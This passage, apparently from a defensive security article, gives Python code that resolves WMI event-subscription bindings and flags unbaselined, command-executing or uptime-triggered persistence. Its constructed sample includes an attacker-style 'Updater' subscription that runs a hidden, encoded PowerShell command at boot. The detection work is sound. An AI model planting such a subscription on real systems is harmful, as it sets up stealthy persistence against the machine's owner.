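    with the filter name and query, the consumer, its payload and a findings list."""
    f_by_name = {f["Name"]: f for f in filters}
    c_by_key = {(c["Class"], c["Name"]): c for c in consumers}
    chains = []
    for b in bindings:
        fm, cm = REF_RE.match(b["Filter"]), REF_RE.match(b["Consumer"])
        if not fm or not cm:
            continue
        flt = f_by_name.get(fm["name"], {})
        con = c_by_key.get((cm["cls"], cm["name"]), {})
        payload = con.get("CommandLineTemplate") or con.get("ScriptText") or ""
        findings = []
        if (fm["name"], cm["cls"], cm["name"]) not in KNOWN_GOOD_BINDINGS:
            findings.append("binding not in known-good baseline")
        if cm["cls"] in EXECUTING_CONSUMERS:
            findings.append(f"{cm['cls']} executes: {payload[:60]}")
        if TIMER_TRIGGERS.search(flt.get("Query", "")):
            findings.append("filter fires on a timer/uptime condition (typical boot-time trigger)")
        chains.append({"filter": fm["name"], "query": flt.get("Query", "<missing>"),
                       "consumer": f"{cm['cls']}:{cm['name']}", "payload": payload,
                       "findings": findings})
    return chains


# Constructed records: the stock SCM binding plus an attacker-style "Updater" subscription.
SAMPLE_FILTERS = [
    {"Name": "SCM Event Log Filter", "QueryLanguage": "WQL",
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"Name": "Updater", "QueryLanguage": "WQL",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "
              "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240"},
]
SAMPLE_CONSUMERS = [
    {"Class": "NTEventLogEventConsumer", "Name": "SCM Event Log Consumer"},
    {"Class": "CommandLineEventConsumer", "Name": "Updater",
     "CommandLineTemplate": "powershell.exe -NoP -W Hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
]
SAMPLE_BINDINGS = [
    {"Filter": '__EventFilter.Name="SCM Event Log Filter"',
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"'},
    {"Filter": '__EventFilter.Name="Updater"',
     "Consumer": 'CommandLineEventConsumer.Name="Updater"'},
]

if __name__ == "__main__":
    for chain in resolve_bindings(SAMPLE_FILTERS, SAMPLE_CONSUMERS, SAMPLE_BINDINGS):
        status = "; ".join(chain["findings"]) or "matches baseline"
        print(f"{chain['filter']} -> {chain['consumer']}: {status}")
```

Enumerate all three classes rather than only the bindings: an orphaned CommandLineEventConsumer with no binding is still an artifact worth recording, and a filter whose query watches uptime tells you when the payload was meant to run.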
Conclusion
Understanding these persistence mechanisms is just the first step. As cybersecurity professionals, we must continuously update our knowledge and tools to detect and respond to these evolving threats. Regular system audits, advanced monitoring tools, and a proactive approach to security are key in staying ahead of attackers.
Remember, in the world of cybersecurity, vigilance is not just a practice; it’s a necessity. Stay informed, stay alert, and stay secure.